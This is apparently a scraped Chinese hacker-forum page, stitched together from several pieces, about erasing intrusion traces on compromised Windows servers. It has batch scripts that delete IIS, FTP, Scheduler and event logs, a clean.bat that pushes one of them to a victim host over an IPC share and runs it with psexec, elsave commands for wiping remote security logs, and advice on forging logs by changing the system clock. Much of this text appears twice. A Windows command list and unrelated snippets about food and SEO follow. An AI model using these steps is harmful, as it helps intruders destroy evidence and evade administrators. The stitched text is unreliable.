1) Scheduler日志
Scheduler服务日志默认位置:2000下: %sys temroot%\schedlgu.txt NTworkstation下为 SchedLog.txt
可以打开schedlgu.txt
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sche *** ngAgent
先停掉他 net stop "task scheduler" (注意不停是删不掉的)
然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.
del sched*.txt
不过你如果不想删他,也可以改改它. 他的内容是这样的:
" "任务计划程序服务"
已退出于 01-5-22 20:37:34
"任务计划程序服务"
已启动于 01-5-25 7:07:37
"任务计划程序服务"
已启动于 01-5-25 7:26:36
"任务计划程序服务"
已退出于 01-5-25 8:47:54 "
很好改的.
(2) FTP日志
Internet信息服务FTP日志默认位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志.
格式是这样的 ex*.log .
注意这是一台NT4的LOGFILES下的文件:
这台服务器下管理有多个HTTP或FTP站点
c:\winnt\sys tem32\logfiles 的目录
00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a *** TPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9
看看日志文件的格式:
c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log
192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,
0, 0, 331, 0, [3]USER, anonymous, -,
192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53
0, 1326, [3]PASS, IE30User@, -,
关于LOG文件的含意我就不解释了,浪费时间,嘿嘿.
法一: 这个时侯 net stop msftpsvc 停掉后台服务.
然后尽管 del 看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.
法二: 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦
实际上在得到ADMIN权限后,做这些事很容易.
法三:) 最傻瓜的清FTP日志的 *** , cleaniislog 小蓉写的工具,不用我再教了吧!
(3) WWW日志
Internet信息服务WWW日志默认位置:%sys temroot%\sys tem32\logfiles\w3svc1\,默认每天一个日志
注意这是一台NT4的LOGFILES下的文件:
这台服务器下管理有多个HTTP或FTP站点
c:\winnt\sys tem32\logfiles 的目录
00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a *** TPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9
w3svc1 下的文件:
说实话我不太懂,帮你 找到这篇文章,你研究一下好了:
什么是日志文件?它是一些文件系统 *** ,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论是 *** 管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除 *** 。
一、日志文件的位置
Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
二、清除自己电脑中的日志
如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到更大日志尺寸时进行改写事件了,不会提示你清除日志。
三、清除远程主机上的日志
大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后之一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单, *** 是:新建一个具有如下内容的批处理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
接下来再新建一个批处理文件,内容如下:
@copy del.bat \%1c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉鸡上运行del.bat,清除日志文件……OK
保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。
清除日志的另外一个 *** 是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。
迩好,我本来就是一黑客游民,很高兴为你服务,这个问题,迩先断网,然后脱机工作 ,下载360或者瑞星,把小虾(菜鸟黑客)下载在迩电脑上的软件删除程序,就可以了。回答完毕,记得给分。
1."控制面板"中进入"管理工具",再双击里面的"事件查看器"。然后选择打开我们需要清除的日志文件,比如用户想清除安全日志,可以右键点击"安全性"选项,在弹出的菜单中选择"属性"命令。接下来在弹出的对话框中,点击下面"清除日志"按钮就可以清除了。
2.如果用户想要清除自己系统中的日志文件,首先需要用管理员账号登录Windows系统,接着在"控制面板"中进入"管理工具",再双击里面的"事件查看器"。然后选择打开我们需要清除的日志文件,比如用户想清除安全日志,可以右键点击"安全性"选项,在弹出的菜单中选择"属性"命令。接下来在弹出的对话框中,点击下面"清除日志"按钮就可以清除了。
刚刚介绍了对于本地的日志文件的清除,但是如果是一名黑客,入侵系统成功后之一件事便是清除日志。黑客会使用两个办法来清除远程计算机上的日志文件。其中一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单:
@del c:\winnt\system32\logfiles\*.*
@del c:\winnt\system32\config\*.evt
@del c:\winnt\system32\dtclog\*.*
@del c:\winnt\system32\*.log
@del c:\winnt\system32\*.txt
@del c:\winnt*.txt
@del c:\winnt*.log
@del c:\dellog.bat
把上面的内容保存为dellog.bat备用。接着通过IPC共享连接到远程计算机上,将这个批处理文件上传到远程计算机系统并执行,即可清除肉鸡上的日志文件。
另外,清除日志文件还可以借助第三方软件,比如小榕的elsave.exe就是一款可以清除远程以及本地系统中系统日志、应用程序日志、安全日志的软件。elsave.exe使用起来很简单,首先还是利用管理员账号建立IPC连接,接着在命令行下执行清除命令,这样就可以删除这些系统中的 *** 日志文件。
如果用PE的话,清除如下目录即可:
c:\winnt\system32\logfiles\*.*
c:\winnt\system32\config\*.evt
c:\winnt\system32\dtclog\*.*
c:\winnt\system32\*.log
c:\winnt\system32\*.txt
c:\winnt*.txt
c:\winnt*.log
c:\dellog.bat
一、日志文件的位置
Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
二、清除自己电脑中的日志
如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到更大日志尺寸时进行改写事件了,不会提示你清除日志。
三、清除远程主机上的日志
大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后之一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单, *** 是:新建一个具有如下内容的批处理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
接下来再新建一个批处理文件,内容如下:
@copy del.bat \%1c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉鸡上运行del.bat,清除日志文件……OK
保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。
清除日志的另外一个 *** 是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。
explorer-------打开资源管理器
Nslookup-------IP地址侦测器
logoff---------注销命令
tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组
services.msc---本地服务设置
oobe/msoobe /a----检查XP是否激活
notepad--------打开记事本
cleanmgr-------垃圾整理
net start messenger----开始信使服务
compmgmt.msc---计算机管理
net stop messenger-----停止信使服务
conf-----------启动netmeeting
dvdplay--------DVD播放器
charmap--------启动字符映射表
diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器
dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk磁盘检查
devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dll文件运行
drwtsn32------ 系统医生
rononce -p ----15秒关机
dxdiag---------检查DirectX信息
regedt32-------注册表编辑器
Msconfig.exe---系统配置实用程序
rsop.msc-------组策略结果集
mem.exe--------显示内存使用情况
regedit.exe----注册表
winchat--------XP自带局域网聊天
progman--------程序管理器
winmsd---------系统信息
perfmon.msc----计算机性能监测程序
winver---------检查Windows版本
sfc /scannow-----扫描错误并复原
taskmgr-----任务管理器(2000/xp/2003
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup------- *** 管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntm *** gr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端 *** 实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
f *** gmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略
此刻的人们仿佛都很是的喜欢炸鸡,所以此刻的炸鸡行业也鼓起了起来,此刻的炸鸡店都很是的受消费者们的喜欢的,所以创业者们也将本身的眼光转向了炸鸡加盟店肆,创业者们想要插手到炸鸡加盟项目中去,去体验被消费者...
假如你要想摆摊来挣钱,最先你卖的物品务必要好用,还得价格低。时期在发展,高新科技在发展趋势,小百货的技术含量也是愈来愈高了,遭受许多顾客的亲睐,那麼卖点什么小玩意赚钱呢?下面一起来了解一下,期待对你有...
最近由于疫情的原因,我们没办法出门,附近的超市也没办法开门,之前一直买的馒头也没办法出门买了,所以只能在家蒸馒头吃。说到蒸馒头,小董记得小时候老妈蒸馒头都是用老面发面,但是现在蒸馒头的时候少了,老妈也...
一、介绍 暗链也称黑链,即荫蔽链接,是黑帽SEO的做弊办法之一,其意图便是运用高权重网站外链来进步自身站点排名。 一般来说,暗链是由攻击者侵略网站后植入的,暗链在网页页面上不行见或许极易被疏忽,可是搜...
本文目录一览: 1、有一本小说 女主女扮男装 黑客 代号黑桃K叫什么九 男主秦少 就记得这么多了 求大神们知道的帮帮忙 2、求女主特别冷血无情到极致的女扮男装小说女主从骨子里特别冷血的小说 3...
可能有一些用户升级Win10之后遇到了应用商店、应用打不开或闪退的问题,此时可尝试通过下面的一些方法来解决。 1、点击任务栏的搜索(Cortana小娜)图标,输入Powershell,在搜索结果中右...